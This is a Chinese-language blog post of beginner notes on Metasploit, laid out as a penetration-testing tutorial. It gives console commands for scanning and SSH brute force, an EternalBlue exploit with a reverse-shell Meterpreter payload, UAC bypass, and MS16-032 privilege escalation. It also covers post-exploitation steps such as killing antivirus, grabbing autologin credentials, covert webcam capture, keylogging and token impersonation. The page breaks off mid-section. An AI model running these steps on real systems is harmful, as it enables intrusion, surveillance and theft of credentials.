<!DOCTYPE HTML>
<html lang="zh-CN">


<head><meta name="generator" content="Hexo 3.9.0">
    <meta charset="utf-8">
    <meta name="keywords" content="Metasploit初学-散记, 技术博客, 网络安全, 信息安全, IT, 计算机, 学习">
    <meta name="description" content="技术博客, 网络安全, 信息安全, IT, 计算机, 学习">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no">
    <meta name="renderer" content="webkit|ie-stand|ie-comp">
    <meta name="mobile-web-app-capable" content="yes">
    <meta name="format-detection" content="telephone=no">
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
    <!-- Global site tag (gtag.js) - Google Analytics -->


    <title>Metasploit初学-散记 | 剑胆琴心</title>
    <link rel="icon" type="image/png" href="/favicon.png">

    <link rel="stylesheet" type="text/css" href="/libs/awesome/css/all.css">
    <link rel="stylesheet" type="text/css" href="/libs/materialize/materialize.min.css">
    <link rel="stylesheet" type="text/css" href="/libs/aos/aos.css">
    <link rel="stylesheet" type="text/css" href="/libs/animate/animate.min.css">
    <link rel="stylesheet" type="text/css" href="/libs/lightGallery/css/lightgallery.min.css">
    <link rel="stylesheet" type="text/css" href="/css/matery.css">
    <link rel="stylesheet" type="text/css" href="/css/my.css">

    <script src="/libs/jquery/jquery.min.js"></script>

<link rel="stylesheet" href="/css/prism-tomorrow.css" type="text/css">
<link rel="stylesheet" href="/css/prism-line-numbers.css" type="text/css"></head>


<body>
    <header class="navbar-fixed">
    <nav id="headNav" class="bg-color nav-transparent">
        <div id="navContainer" class="nav-wrapper container">
            <div class="brand-logo">
                <a href="/" class="waves-effect waves-light">
                    
                    <img src="/medias/logo.png" class="logo-img" alt="LOGO">
                    
                    <span class="logo-span">剑胆琴心</span>
                </a>
            </div>
            

<a href="#" data-target="mobile-nav" class="sidenav-trigger button-collapse"><i class="fas fa-bars"></i></a>
<ul class="right nav-menu">
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/" class="waves-effect waves-light">
      
      <i class="fas fa-home" style="zoom: 0.6;"></i>
      
      <span>首页</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/tags" class="waves-effect waves-light">
      
      <i class="fas fa-tags" style="zoom: 0.6;"></i>
      
      <span>标签</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/categories" class="waves-effect waves-light">
      
      <i class="fas fa-bookmark" style="zoom: 0.6;"></i>
      
      <span>分类</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/archives" class="waves-effect waves-light">
      
      <i class="fas fa-archive" style="zoom: 0.6;"></i>
      
      <span>归档</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/about" class="waves-effect waves-light">
      
      <i class="fas fa-user-circle" style="zoom: 0.6;"></i>
      
      <span>关于</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/contact" class="waves-effect waves-light">
      
      <i class="fas fa-comments" style="zoom: 0.6;"></i>
      
      <span>留言板</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/friends" class="waves-effect waves-light">
      
      <i class="fas fa-address-book" style="zoom: 0.6;"></i>
      
      <span>友情链接</span>
    </a>
    
  </li>
  
  <li>
    <a href="#searchModal" class="modal-trigger waves-effect waves-light">
      <i id="searchIcon" class="fas fa-search" title="搜索" style="zoom: 0.85;"></i>
    </a>
  </li>
</ul>


<div id="mobile-nav" class="side-nav sidenav">

    <div class="mobile-head bg-color">
        
        <img src="/medias/logo.png" class="logo-img circle responsive-img">
        
        <div class="logo-name">剑胆琴心</div>
        <div class="logo-desc">
            
            技术博客, 网络安全, 信息安全, IT, 计算机, 学习
            
        </div>
    </div>

    

    <ul class="menu-list mobile-menu-list">
        
        <li class="m-nav-item">
	  
		<a href="/" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-home"></i>
			
			首页
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/tags" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-tags"></i>
			
			标签
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/categories" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-bookmark"></i>
			
			分类
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/archives" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-archive"></i>
			
			归档
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/about" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-user-circle"></i>
			
			关于
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/contact" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-comments"></i>
			
			留言板
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/friends" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-address-book"></i>
			
			友情链接
		</a>
          
        </li>
        
        
        <li><div class="divider"></div></li>
        <li>
            <a href="https://github.com/shuai06" class="waves-effect waves-light" target="_blank">
                <i class="fab fa-github-square fa-fw"></i>Fork Me
            </a>
        </li>
        
    </ul>
</div>


        </div>

        
            <style>
    .nav-transparent .github-corner {
        display: none !important;
    }

    .github-corner {
        position: absolute;
        z-index: 10;
        top: 0;
        right: 0;
        border: 0;
        transform: scale(1.1);
    }

    .github-corner svg {
        color: #0f9d58;
        fill: #fff;
        height: 64px;
        width: 64px;
    }

    .github-corner:hover .octo-arm {
        animation: a 0.56s ease-in-out;
    }

    .github-corner .octo-arm {
        animation: none;
    }

    @keyframes a {
        0%,
        to {
            transform: rotate(0);
        }
        20%,
        60% {
            transform: rotate(-25deg);
        }
        40%,
        80% {
            transform: rotate(10deg);
        }
    }
</style>

<a href="https://github.com/shuai06" class="github-corner tooltipped hide-on-med-and-down" target="_blank"
   data-tooltip="Fork Me" data-position="left" data-delay="50">
    <svg viewBox="0 0 250 250" aria-hidden="true">
        <path d="M0,0 L115,115 L130,115 L142,142 L250,250 L250,0 Z"></path>
        <path d="M128.3,109.0 C113.8,99.7 119.0,89.6 119.0,89.6 C122.0,82.7 120.5,78.6 120.5,78.6 C119.2,72.0 123.4,76.3 123.4,76.3 C127.3,80.9 125.5,87.3 125.5,87.3 C122.9,97.6 130.6,101.9 134.4,103.2"
              fill="currentColor" style="transform-origin: 130px 106px;" class="octo-arm"></path>
        <path d="M115.0,115.0 C114.9,115.1 118.7,116.5 119.8,115.4 L133.7,101.6 C136.9,99.2 139.9,98.4 142.2,98.6 C133.8,88.0 127.5,74.4 143.8,58.0 C148.5,53.4 154.0,51.2 159.7,51.0 C160.3,49.4 163.2,43.6 171.4,40.1 C171.4,40.1 176.1,42.5 178.8,56.2 C183.1,58.6 187.2,61.8 190.9,65.4 C194.5,69.0 197.7,73.2 200.1,77.6 C213.8,80.2 216.3,84.9 216.3,84.9 C212.7,93.1 206.9,96.0 205.4,96.6 C205.1,102.4 203.0,107.8 198.3,112.5 C181.9,128.9 168.3,122.5 157.7,114.1 C157.9,116.9 156.7,120.9 152.7,124.9 L141.0,136.5 C139.8,137.7 141.6,141.9 141.8,141.8 Z"
              fill="currentColor" class="octo-body"></path>
    </svg>
</a>
        
    </nav>

</header>

    
<script src="/libs/cryptojs/crypto-js.min.js"></script>
<script>
    (function() {
        let pwd = '';
        if (pwd && pwd.length > 0) {
            if (pwd !== CryptoJS.SHA256(prompt('请输入访问本文章的密码')).toString(CryptoJS.enc.Hex)) {
                alert('密码错误，将返回主页！');
                location.href = '/';
            }
        }
    })();
</script>




<div class="bg-cover pd-header post-cover" style="background-image: url('/medias/featureimages/23.jpg')">
    <div class="container" style="right: 0px;left: 0px;">
        <div class="row">
            <div class="col s12 m12 l12">
                <div class="brand">
                    <h1 class="description center-align post-title">Metasploit初学-散记</h1>
                </div>
            </div>
        </div>
    </div>
</div>




<main class="post-container content">

    
    <link rel="stylesheet" href="/libs/tocbot/tocbot.css">
<style>
    #articleContent h1::before,
    #articleContent h2::before,
    #articleContent h3::before,
    #articleContent h4::before,
    #articleContent h5::before,
    #articleContent h6::before {
        display: block;
        content: " ";
        height: 100px;
        margin-top: -100px;
        visibility: hidden;
    }

    #articleContent :focus {
        outline: none;
    }

    .toc-fixed {
        position: fixed;
        top: 64px;
    }

    .toc-widget {
        width: 345px;
        padding-left: 20px;
    }

    .toc-widget .toc-title {
        margin: 35px 0 15px 0;
        padding-left: 17px;
        font-size: 1.5rem;
        font-weight: bold;
        line-height: 1.5rem;
    }

    .toc-widget ol {
        padding: 0;
        list-style: none;
    }

    #toc-content {
        height: calc(100vh - 250px);
        overflow: auto;
    }

    #toc-content ol {
        padding-left: 10px;
    }

    #toc-content ol li {
        padding-left: 10px;
    }

    #toc-content .toc-link:hover {
        color: #42b983;
        font-weight: 700;
        text-decoration: underline;
    }

    #toc-content .toc-link::before {
        background-color: transparent;
        max-height: 25px;

        position: absolute;
        right: 23.5vw;
        display: block;
    }

    .toc-fixed .toc-link::before{
        position: fixed!important;/*当toc的位置改为fixed时，.toc-link::before也要改为fixed*/
    }

    #toc-content .is-active-link {
        color: #42b983;
    }

    #toc-content .is-active-link::before {
        background-color: #42b983;
    }

    #floating-toc-btn {
        position: fixed;
        right: 15px;
        bottom: 76px;
        padding-top: 15px;
        margin-bottom: 0;
        z-index: 998;
    }

    #floating-toc-btn .btn-floating {
        width: 48px;
        height: 48px;
    }

    #floating-toc-btn .btn-floating i {
        line-height: 48px;
        font-size: 1.4rem;
    }
</style>
<div class="row">
    <div id="main-content" class="col s12 m12 l9">
        <!-- 文章内容详情 -->
<div id="artDetail">
    <div class="card">
        <div class="card-content article-info">
            <div class="row tag-cate">
                <div class="col s7">
                    
                    <div class="article-tag">
                        
                            <a href="/tags/Metasploit/">
                                <span class="chip bg-color">Metasploit</span>
                            </a>
                        
                    </div>
                    
                </div>
                <div class="col s5 right-align">
                    
                    <div class="post-cate">
                        <i class="fas fa-bookmark fa-fw icon-category"></i>
                        
                            <a href="/categories/渗透测试/" class="post-category">
                                渗透测试
                            </a>
                        
                    </div>
                    
                </div>
            </div>

            <div class="post-info">
                
                <div class="post-date info-break-policy">
                    <i class="far fa-calendar-minus fa-fw"></i>发布日期:&nbsp;&nbsp;
                    2020-05-09
                </div>
                

                

                
                <div class="info-break-policy">
                    <i class="far fa-file-word fa-fw"></i>文章字数:&nbsp;&nbsp;
                    5.6k
                </div>
                

                
                <div class="info-break-policy">
                    <i class="far fa-clock fa-fw"></i>阅读时长:&nbsp;&nbsp;
                    22 分
                </div>
                

                
                    <div id="busuanzi_container_page_pv" class="info-break-policy">
                        <i class="far fa-eye fa-fw"></i>阅读次数:&nbsp;&nbsp;
                        <span id="busuanzi_value_page_pv"></span>
                    </div>
				
            </div>
        </div>
        <hr class="clearfix">
        <div class="card-content article-card-content">
            <div id="articleContent">
                <h1 id="MSF"><a href="#MSF" class="headerlink" title="MSF"></a>MSF</h1><blockquote>
<p>最牛X的地方是：支持整个渗透测试过程</p>
</blockquote>
<h2 id="理论方面"><a href="#理论方面" class="headerlink" title=" 理论方面"></a><font color="red"> 理论方面</font></h2><p><img src="http://image.xpshuai.cn/msf_1.png" alt=""></p>
<h4 id="技术架构"><a href="#技术架构" class="headerlink" title="技术架构"></a>技术架构</h4><p><strong>1.辅助模块（auxiliary）</strong><br>包含了扫描、嗅探、指纹识别、网络欺骗等相关功能模块<br><img src="http://image.xpshuai.cn/msf_2.png" alt=""></p>
<p><strong>2.渗透攻击模块(exploits)</strong><br>利用程序，针对漏洞、权限进行利用，是主要使用的模块<br><img src="http://image.xpshuai.cn/msf_3.png" alt=""></p>
<p><strong>3.攻击载荷模块(payload)</strong><br>用于在目标系统中运行任意命令或者执行特定代码，主要用于shell获取<br><img src="http://image.xpshuai.cn/msf_5.png" alt=""></p>
<p><strong>4.空指令模块(nops)</strong><br><img src="http://image.xpshuai.cn/msf_5.png" alt=""></p>
<p><strong>5.编码器模块(encoders)</strong><br><img src="http://image.xpshuai.cn/msf_6.png" alt=""></p>
<p><strong>6.后渗透攻击模块(post)</strong><br><img src="http://image.xpshuai.cn/msf_7.png" alt=""></p>
<p><strong>7.免杀模块(evasion)</strong></p>
<h4 id="接口"><a href="#接口" class="headerlink" title="接口"></a>接口</h4><p>MSF有四种接口对外提供：<code>msfconsole</code>, <code>msfcli</code>,  <code>msfgui</code>,  <code>msfweb</code></p>
<h4 id="为什么要使用Metasploit"><a href="#为什么要使用Metasploit" class="headerlink" title="为什么要使用Metasploit"></a>为什么要使用Metasploit</h4><p><img src="http://image.xpshuai.cn/msf_8.png" alt=""><br>开发版是没有生成报告的功能的（商业版才有），但是开发版的脚本更多，每个版本各有利弊</p>
<ol>
<li><p>情报搜集阶段<br><img src="http://image.xpshuai.cn/msf_9.png" alt=""><br>有数据库</p>
</li>
<li><p>威胁建模阶段<br><img src="http://image.xpshuai.cn/msf_10.png" alt=""></p>
</li>
<li><p>漏洞分析阶段<br><img src="http://image.xpshuai.cn/msf_11.png" alt=""></p>
</li>
<li><p>后渗透攻击模块<br><img src="http://image.xpshuai.cn/msf_13.png" alt=""></p>
</li>
<li><p>报告生成模块<br><img src="http://image.xpshuai.cn/msf_13.png" alt=""></p>
</li>
</ol>
<hr>
<h2 id="使用MSF"><a href="#使用MSF" class="headerlink" title=" 使用MSF"></a><font color="red"> 使用MSF</font></h2><h4 id="准备使用"><a href="#准备使用" class="headerlink" title="准备使用"></a>准备使用</h4><p><strong>启动MSF</strong><br><code>msfconsole</code><br>可以配置数据库等</p>
<p><strong>更新MSF</strong></p>
<pre class="line-numbers language-bash"><code class="language-bash"><span class="token function">apt-get</span> update
<span class="token function">apt-get</span> <span class="token function">install</span> metasploit-framework
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span></span></code></pre>
<p><strong>软件安装目录</strong></p>
<pre class="line-numbers language-bash"><code class="language-bash">/usr/share/metasploit-framework
<span class="token comment" spellcheck="true"># 数据目录(其中一些字典和脚本我们用的时候可以拿)</span>
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span></span></code></pre>
<p><strong>模块</strong><br>一个模块就是一个rb脚本</p>
<h4 id="情报搜集"><a href="#情报搜集" class="headerlink" title="情报搜集"></a>情报搜集</h4><blockquote>
<p>首先search 搜索有哪些可用的模块</p>
</blockquote>
<p><strong>1.网站敏感目录扫描：</strong></p>
<pre class="line-numbers language-bash"><code class="language-bash">/usr/share/metasploit-framework/modules/auxiliary/scanner 里面自己看都有啥

<span class="token comment" spellcheck="true">## 使用 brute_dirs, dir_listing, dir_Scanner等辅助模块来进行敏感目录扫描</span>
<span class="token comment" spellcheck="true"># 他们主要使用暴力猜解的方式工作，需要提供目录字典</span>

<span class="token comment" spellcheck="true"># 使用模块</span>
use auxiliary/scanner/http/dir_scanner
<span class="token comment" spellcheck="true"># 查看详细信息</span>
info
<span class="token comment" spellcheck="true"># 查看需要设置的参数</span>
show options   

<span class="token comment" spellcheck="true"># 设置参数（取消设置参数是 unset）</span>
<span class="token keyword">set</span> RHOTS 192.168.0.101
<span class="token keyword">set</span> PATH /cms/
<span class="token comment" spellcheck="true"># 攻击</span>
exploit
<span class="token comment" spellcheck="true"># 返回上一级退出当前模块</span>
back

<span class="token comment" spellcheck="true"># 两个可选命令</span>
setg, unsetg  <span class="token comment" spellcheck="true"># 用于在msfconsole中设置或取消设置全局性的参数，从而避免重复输入相同的值</span>
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p>使用常用的辅助模块进行服务扫描(<code>search scanner</code>)</p>
<p><strong>2.主机发现</strong></p>
<pre class="line-numbers language-bash"><code class="language-bash"><span class="token comment" spellcheck="true">## 用于主机发现的辅助模块，位于 modules/auxiliary/scanner/discovery</span>
use /auxiliary/scanner/discovery/arp_sweep
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span></span></code></pre>
<p><img src="http://image.xpshuai.cn/msf_14.png" alt=""></p>
<p>还是nmap速度快, 可以直接在msf中使用<code>nmap</code></p>
<p><strong>3.端口扫描</strong><br>search  portscan</p>
<pre class="line-numbers language-bash"><code class="language-bash">auxiliary/scanner/portscan/ack
auxiliary/scanner/portscan/syn  <span class="token comment" spellcheck="true"># 推荐这个(速度快，准确，不易被发现)</span>
auxiliary/scanner/portscan/xmas
auxiliary/scanner/portscan/ftpbounce
auxiliary/scanner/portscan/tcp

use <span class="token punctuation">..</span><span class="token punctuation">..</span><span class="token punctuation">..</span>
show options
<span class="token keyword">set</span> xxx
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p><img src="http://image.xpshuai.cn/msf_15.png" alt=""></p>
<p><strong>4.探测服务详细信息</strong><br><img src="http://image.xpshuai.cn/msf_16.png" alt=""></p>
<p><strong>5.服务查点</strong><br>用户服务扫描和查点的工具，通常以<code>[server_name]_version</code>命名</p>
<ul>
<li><p>telnet服务查点(查哪些主机开了telnet服务，而namp是查看某主机开放了哪些服务)<br><img src="http://image.xpshuai.cn/msf_17.png" alt=""></p>
</li>
<li><p>SSH服务查点</p>
<pre class="line-numbers language-bash"><code class="language-bash">use auxiliary/scanner/ssh/ssh_version
<span class="token comment" spellcheck="true"># 口令爆破</span>
use auxiliary/scanner/ssh/ssh_login
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>
</li>
<li><p>MSSQL服务查点</p>
<pre class="line-numbers language-bash"><code class="language-bash">use auxiliary/scanner/mssql/mssql_version
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
</li>
</ul>
<p><strong>永恒之蓝实践</strong></p>
<pre class="line-numbers language-bash"><code class="language-bash"><span class="token comment" spellcheck="true"># 先扫描是否存在</span>
use auxiliary/scanner/smb/ms17_010_eternalblue
<span class="token punctuation">..</span>.

<span class="token comment" spellcheck="true"># 载利用攻击模块</span>
use exploit/windows/smb/ms17_010_eternalblue
<span class="token keyword">set</span> payload windows/x64/meterpreter/reverse_tcp
<span class="token keyword">set</span> RHOST <span class="token punctuation">..</span>.
<span class="token punctuation">..</span>.
exploit
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<h4 id="漏洞利用"><a href="#漏洞利用" class="headerlink" title="漏洞利用"></a>漏洞利用</h4><p>收集完信息后，选择正确的exploit，payload</p>
<p>这里假设是Samba<br><code>info exploit/multi/samba/usermap_sript</code>,  可以查看到利用成功率<code>Rank</code>越高，成功率越大<br><code>use exploit/multi/samba/usermap_sript</code><br><code>show options</code><br><code>set PAYLOAD cmd/unix/reverse</code><br>… … </p>
<h4 id="Bypass-UAC"><a href="#Bypass-UAC" class="headerlink" title="Bypass UAC"></a>Bypass UAC</h4><pre class="line-numbers language-bash"><code class="language-bash">use exploit/windows/local/bypassuac
<span class="token keyword">set</span> session 1
run
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>
<h4 id="Meterpreter（属于后渗透攻击）"><a href="#Meterpreter（属于后渗透攻击）" class="headerlink" title="Meterpreter（属于后渗透攻击）"></a>Meterpreter（属于后渗透攻击）</h4><blockquote>
<p>Metasploit框架中的一个扩展模块</p>
</blockquote>
<p>作为<code>溢出成功以后的</code>攻击载荷使用，攻击载荷在溢出攻击成功以后给我们返回一个控制通道。使用它作为攻击载荷能够获得目标系统的一个Meterpreter shell的链接<br><a href="https://www.cnblogs.com/backlion/p/9484949.html" target="_blank" rel="noopener">https://www.cnblogs.com/backlion/p/9484949.html</a></p>
<pre class="line-numbers language-bash"><code class="language-bash">Meterpreter shell作为渗透模块有很多有用的功能，比如添加一个用户、隐藏一些东西、打开shell、得到用户密码、上传下载远程主机的文件、运行cmd.exe、捕捉屏幕、得到远程控制权、捕获按键信息、清除应用程序、显示远程主机的系统信息、显示远程机器的网络接口和IP地址等信息。另外Meterpreter能够躲避入侵检测系统。在远程主机上隐藏自己,它不改变系统硬盘中的文件,因此HIDS<span class="token punctuation">[</span>基于主机的入侵检测系统<span class="token punctuation">]</span>很难对它做出响应。此外它在运行的时候系统时间是变化的,所以跟踪它或者终止它对于一个有经验的人也会变得非常困难。


<span class="token comment" spellcheck="true"># 优势</span>
- 纯内存工作模式，不需要对内存进行写入操作
- 使用加密通信协议，且可以同时与几个信道通信
- 在被攻击进程内工作，不需要创建新的进程
- 易于在多进程之间迁移
- 平台通用
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p><strong>进程迁移</strong><br>刚获取Meterpreter shell的时候，是脆弱的(用户随时可能关闭)，所以第一时间是移动shell，把它和一个稳定的进程绑定在一起，而不需要对磁盘进行任何写入操作(更不易被发现)</p>
<pre class="line-numbers language-bash"><code class="language-bash"><span class="token function">ps</span>    <span class="token comment" spellcheck="true"># 获取目标正在运行的进程</span>
getpid    <span class="token comment" spellcheck="true"># 查看Meterpreter shell的进程号</span>
mirate 448    <span class="token comment" spellcheck="true"># 把shell移动到PID为448的进程里(因为这里这个稳定，看情况来吧)</span>

getpid  <span class="token comment" spellcheck="true"># 发现shell的进程迁移OK(原来的进程会自动关闭，如果没关闭就手动关掉：kill xxx_pid)</span>

<span class="token comment" spellcheck="true"># 自动迁移进程指令(系统会自动寻找合适的进程然后迁移)</span>
run post/windows/manage/migrate
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p><strong>常用命令</strong></p>
<pre class="line-numbers language-bash"><code class="language-bash"><span class="token comment" spellcheck="true">########## 系统命令（收集系统信息）</span>
systeminfo    <span class="token comment" spellcheck="true"># 查看系统信息</span>
run post/windows/gather/checkv    <span class="token comment" spellcheck="true"># 检查是否为虚拟机</span>
idletime    <span class="token comment" spellcheck="true"># 目标机器最近运行时间</span>

ifconfig/ipconfig     <span class="token comment" spellcheck="true"># 查看网卡信息</span>
route    <span class="token comment" spellcheck="true"># 查看路由信息，设置路由（做跳板用）</span>

background        <span class="token comment" spellcheck="true"># 把会话放到后台，这个会话继续保持</span>
sessions     <span class="token comment" spellcheck="true"># 查看会话列表</span>
sessions -i 2    <span class="token comment" spellcheck="true"># 进入切回会话2</span>

getuid    <span class="token comment" spellcheck="true"># 获取当前用户id权限</span>
run post/windows/manage/killav <span class="token comment" spellcheck="true"># 关闭杀毒(其他命令自己探索)</span>
run post/windows/manage/enable_rdp <span class="token comment" spellcheck="true"># 开启目标机器的远程桌面</span>

run post/windows/manage/autoroute <span class="token comment" spellcheck="true"># 查看目标机的本地子网情况</span>
<span class="token comment" spellcheck="true"># 接着进行跳转</span>
background <span class="token comment" spellcheck="true"># 把当前终端隐藏在后台</span>
route add 192.168.0.111 255.255.255.0 1  <span class="token comment" spellcheck="true"># 给指定会话id添加路由(可以添加其他地址到被攻陷的机器的路由表上，借助被攻陷的机器来攻击其他网络)</span>
route print    <span class="token comment" spellcheck="true"># 查看路由添加结果</span>
<span class="token comment" spellcheck="true"># 接着查看</span>
run post/windows/gather/enum_logged_on_users   <span class="token comment" spellcheck="true"># 列举当前有多少用户登录了主机</span>
run post/windows/gather/enum_logged_on_users   <span class="token comment" spellcheck="true"># 继续列举安装在目标机器上的应用</span>
run post/windows/gather/credentials/windows_autologin  <span class="token comment" spellcheck="true"># 很多用户习惯将计算机设置自动登录(抓取自动登录的密码)，如果看不到任何信息，就需要拓展插件Expia</span>
load espia <span class="token comment" spellcheck="true"># 先加载该插件</span>
screengrab    <span class="token comment" spellcheck="true"># 就可以抓取此时目标机器的屏幕截图</span>
screenshot    <span class="token comment" spellcheck="true"># 也是截屏</span>

webcam snap  <span class="token comment" spellcheck="true"># 打开目标机器摄像头，拍摄一张照片</span>
webcam_stream  <span class="token comment" spellcheck="true"># 开始摄像头(直播模式)，在浏览器输入给出的url发那个问即可</span>

<span class="token function">shutdown</span>       <span class="token comment" spellcheck="true"># 关机</span>

shell        <span class="token comment" spellcheck="true"># 进入目标系统的shell下面</span>
<span class="token keyword">exit</span>        <span class="token comment" spellcheck="true"># 停止meterpreter会话（也可以停止shell并返回到meterpreter）</span>
quit        <span class="token comment" spellcheck="true"># 关闭当前的Meterpreter会话，返回MSF终端</span>





<span class="token comment" spellcheck="true">########## 文件系统命令</span>
<span class="token function">pwd</span>    /   getwd  <span class="token comment" spellcheck="true"># 查看目标机器当前目录 </span>
getlwd    <span class="token comment" spellcheck="true"># 查看本机当前目录 </span>
<span class="token function">cd</span>    <span class="token comment" spellcheck="true"># 切换目录(注意\的转义)</span>
<span class="token function">ls</span>    <span class="token comment" spellcheck="true"># 查看当前目录内容</span>
search    -f *.txt      -d c: <span class="token comment" spellcheck="true"># 搜索文件（search -h 查看帮助） -d指定目录， -f搜索模式</span>
upload    /var/www/test.txt c:\  <span class="token comment" spellcheck="true"># 上传文件到目标机器的路径</span>
download     c:\test.txt  <span class="token comment" spellcheck="true"># 下载文件(默认保存到msf的目录)</span>
<span class="token function">cat</span>    <span class="token comment" spellcheck="true"># 查看文件内容</span>
edit <span class="token comment" spellcheck="true"># 编辑文件</span>
execute    -f c:\\windows\\system32\\calc.exe  <span class="token comment" spellcheck="true"># 执行文件</span>


run keylogrecorder   <span class="token punctuation">..</span><span class="token punctuation">..</span> <span class="token comment" spellcheck="true"># 键盘记录？</span>
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<h6 id="后渗透攻击：提权"><a href="#后渗透攻击：提权" class="headerlink" title="后渗透攻击：提权"></a>后渗透攻击：提权</h6><ul>
<li>纵向提权</li>
<li>横向提权</li>
</ul>
<pre class="line-numbers language-bash"><code class="language-bash"><span class="token comment" spellcheck="true"># 获取Meterpreter Shell之后，查看我们是什么权限</span>
<span class="token comment" spellcheck="true"># Meterpreter 下输入</span>
shell    <span class="token comment" spellcheck="true"># 进入目标的cmd</span>
<span class="token function">whoami</span> /groups  <span class="token comment" spellcheck="true"># 查看当前权限</span>
<span class="token comment" spellcheck="true">## 下面就开始进行提权了</span>
<span class="token comment" spellcheck="true"># 用本地溢出漏洞，利用现成的exploit</span>
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p><strong>1.利用WMIC实战MS16-032本地溢出漏洞</strong></p>
<pre class="line-numbers language-bash"><code class="language-bash"><span class="token comment" spellcheck="true"># WMIC是win一个命令行工具(交互模式/非交互模式)，不仅可管理本机还可管理域内所有远程主机(前提是有权限)，而被管理者不需要安装WMIC</span>
<span class="token comment" spellcheck="true"># WMIC在信息搜集和后渗透十分有用，可以调查目标机的进程，服务，用户，用户组，网络连接，硬盘信息，时区，操作系统信息等</span>


<span class="token comment" spellcheck="true"># 假设拿到了Meterpreter shell</span>
getuid
getsystem    <span class="token comment" spellcheck="true"># 尝试提权，但是失败</span>
<span class="token comment" spellcheck="true"># 接着查看系统打了的补丁(传统方法：在目标cmd输入systeminfo，或查询C:\windows\补丁号.log)</span>
<span class="token comment" spellcheck="true"># 这里利用WMIC命令列出安装的补丁</span>
WMIC qfe get Caption,Description,HotFixID,IntalledOn
<span class="token comment" spellcheck="true"># 找到打的补丁后，去找exp(然后将系统安装的补丁编号与提权exp编号比对，然后使用没有编号的exp进行提权)</span>
<span class="token comment" spellcheck="true">## 漏洞信息网站： 安全焦点， Expolit-DB</span>
<span class="token comment" spellcheck="true"># 接下来准备提权(把Meterpreter放到后台：background), 然后搜索ms16-032</span>
search ms16-032    <span class="token comment" spellcheck="true"># 如果找不到，可以试试升级：msfupdate  或者手动添加相应漏洞EXP</span>
use exploit/windows/local/ms16_032_secondary_logon_handle_privsec
<span class="token keyword">set</span> session 1
run
<span class="token comment" spellcheck="true"># 会返回一个新的session，进入，执行getuid 反省是system权限了</span>
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p><strong>2.令牌窃取</strong><br>令牌(Token)就是系统的<code>临时密钥</code>, 相当与账户密码，特点是随机性和不可预测<br>在假冒令牌攻击中需要使用<code>Kerberos</code>协议(一种网络认证协议，其设计目的是通过密钥系统为客户机/服务器应用程序提供强大的认证服务)<br>Kerberos工作机制：<br>xxx待补充</p>
<p>假冒令牌实战利用</p>
<pre class="line-numbers language-bash"><code class="language-bash"><span class="token comment" spellcheck="true"># 假设已经拿到了Meterpreter shell</span>
getuid
getsystem <span class="token comment" spellcheck="true"># 提权失败</span>

use incognito
list token -u <span class="token comment" spellcheck="true"># 列出可用的token(会看到结果，根据Meterpreter shell的权限而定)</span>
<span class="token comment" spellcheck="true"># 假设从输出信息中看到了目标机器的..., 继续在incognito中执行</span>
impersonate_token WIN7-TEST\\Administrator <span class="token comment" spellcheck="true"># 调用incognito中的这个impersonate_token 命令，来假冒Admin进行攻击(注意是两个反斜杠)</span>
shell
